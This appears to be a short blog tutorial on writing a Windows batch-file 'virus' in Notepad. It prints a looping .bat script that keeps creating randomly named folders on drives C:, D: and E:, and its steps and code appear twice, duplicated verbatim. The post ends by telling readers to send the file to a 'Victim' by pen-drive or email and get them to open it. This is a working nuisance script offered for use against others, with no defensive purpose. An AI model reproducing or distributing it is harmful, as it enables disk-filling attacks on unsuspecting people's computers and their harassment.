Making Simple Virus with notepad in windows
Here
we are going to show, How to make Simple Virus in notepad. This virus
will create Unlimited Folder in each drive. Let's Start.
[ Note : Don't try it on your computer ]
Step 1: Open your notepad from [Start >> Run >> Type "Notepad" >>Press Enter ]
Step 2 : Copy the Following Code and paste it in notepad then Save it as "virus.bat". [you can also save with different name but extension must be .bat]
@echo off
:VIRUS
cd /d C:
md %RANDOM%
cd /d D:
md %RANDOM%
cd /d E:
md %RANDOM%
goto VIRUS
REM #######################
REM rnkpatel.com
[ Note : Don't try it on your computer ]
Step 1: Open your notepad from [Start >> Run >> Type "Notepad" >>Press Enter ]
Step 2 : Copy the Following Code and paste it in notepad then Save it as "virus.bat". [you can also save with different name but extension must be .bat]
@echo off
:VIRUS
cd /d C:
md %RANDOM%
cd /d D:
md %RANDOM%
cd /d E:
md %RANDOM%
goto VIRUS
REM #######################
REM rnkpatel.com
Step 3: Now Give this file to Victim via Pen-drive or Mail then ask to Open it.


0 comments:
Post a Comment